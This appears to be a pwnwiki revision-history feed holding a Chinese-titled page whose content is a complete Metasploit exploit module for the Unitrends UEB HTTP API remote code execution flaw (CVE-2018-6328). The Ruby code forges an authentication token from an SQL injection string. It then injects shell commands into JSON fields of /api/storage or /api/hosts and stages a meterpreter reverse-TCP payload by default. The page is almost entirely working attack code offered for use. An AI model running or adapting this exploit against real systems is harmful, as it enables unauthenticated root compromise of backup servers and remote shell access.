https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2018-6328_Unitrends_UEB_HTTP_API_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2018-6328 Unitrends UEB HTTP API 遠程代碼執行漏洞 - Revision history
2026-04-15T06:33:32Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2018-6328_Unitrends_UEB_HTTP_API_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1510&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule..."
2021-04-11T01:24:34Z
<p>Created page with "==EXP== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
##<br />
# This module requires Metasploit: https://metasploit.com/download<br />
# Current source: https://github.com/rapid7/metasploit-framework<br />
##<br />
<br />
class MetasploitModule < Msf::Exploit::Remote<br />
Rank = ExcellentRanking<br />
<br />
include Msf::Exploit::Remote::HttpClient<br />
include Msf::Exploit::CmdStager<br />
<br />
def initialize(info = {})<br />
super(update_info(info,<br />
'Name' => 'Unitrends UEB http api remote code execution',<br />
'Description' => %q{<br />
It was discovered that the api/storage web interface in Unitrends Backup (UB)<br />
before 10.0.0 has an issue in which one of its input parameters was not validated.<br />
A remote attacker could use this flaw to bypass authentication and execute arbitrary<br />
commands with root privilege on the target system.<br />
UEB v9 runs the api under root privileges and api/storage is vulnerable.<br />
UEB v10 runs the api under limited privileges and api/hosts is vulnerable.<br />
},<br />
'Author' =><br />
[<br />
'Cale Smith', # @0xC413<br />
'Benny Husted', # @BennyHusted<br />
'Jared Arave', # @iotennui<br />
'h00die'<br />
],<br />
'License' => MSF_LICENSE,<br />
'Platform' => 'linux',<br />
'Arch' => [ARCH_X86],<br />
'CmdStagerFlavor' => [ 'printf' ],<br />
'References' =><br />
[<br />
['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'],<br />
['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000006002'],<br />
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'],<br />
['URL', 'http://blog.redactedsec.net/exploits/2018/01/29/UEB9.html'],<br />
['EDB', '44297'],<br />
['CVE', '2017-12478'],<br />
['CVE', '2018-6328']<br />
],<br />
'Targets' =><br />
[<br />
[ 'UEB 9.*', { 'Privileged' => true} ],<br />
[ 'UEB < 10.1.0', { 'Privileged' => false} ]<br />
],<br />
'DefaultOptions' => {<br />
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',<br />
'SSL' => true<br />
},<br />
'DisclosureDate' => 'Aug 8 2017',<br />
'DefaultTarget' => 0))<br />
register_options(<br />
[<br />
Opt::RPORT(443),<br />
OptBool.new('SSL', [true, 'Use SSL', true])<br />
])<br />
deregister_options('SRVHOST', 'SRVPORT')<br />
end<br />
<br />
def auth_token<br />
session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass<br />
Base64.strict_encode64(session) #b64 encode session token<br />
end<br />
<br />
def check<br />
res = send_request_cgi!({<br />
'method' => 'GET',<br />
'uri' => '/api/systems/details',<br />
'ctype' => 'application/json',<br />
'headers' =><br />
{'AuthToken' => auth_token}<br />
})<br />
if res && res.code == 200<br />
print_good("Good news, looks like a vulnerable version of UEB.")<br />
return CheckCode::Appears<br />
else<br />
print_bad('Host does not appear to be vulnerable.')<br />
end<br />
return CheckCode::Safe<br />
end<br />
<br />
#substitue some charactes<br />
def filter_bad_chars(cmd)<br />
cmd.gsub!("\\", "\\\\\\")<br />
cmd.gsub!("'", '\\"')<br />
end<br />
<br />
def execute_command(cmd, opts = {})<br />
if target.name == 'UEB 9.*'<br />
#substitue the cmd into the hostname parameter<br />
parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|<br />
parms << filter_bad_chars(cmd)<br />
parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|<br />
uri = '/api/storage'<br />
elsif target.name == 'UEB < 10.1.0'<br />
parms = %Q|{"name":"ffff","ip":"10.0.0.200'\\"`0&|<br />
parms << filter_bad_chars(cmd)<br />
parms << %Q|`'"}|<br />
uri = '/api/hosts'<br />
end<br />
<br />
res = send_request_cgi({<br />
'uri' => uri,<br />
'method' => 'POST',<br />
'ctype' => 'application/json',<br />
'encode_params' => false,<br />
'data' => parms,<br />
'headers' =><br />
{'AuthToken' => auth_token}<br />
})<br />
<br />
if res && res.code != 500<br />
fail_with(Failure::UnexpectedReply,'Unexpected response')<br />
end<br />
rescue ::Rex::ConnectionError<br />
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")<br />
end<br />
<br />
def exploit<br />
print_status("#{peer} - Sending requests to UEB...")<br />
execute_cmdstager(:linemax => 120)<br />
end<br />
end<br />
<br />
</pre></div>
Pwnwiki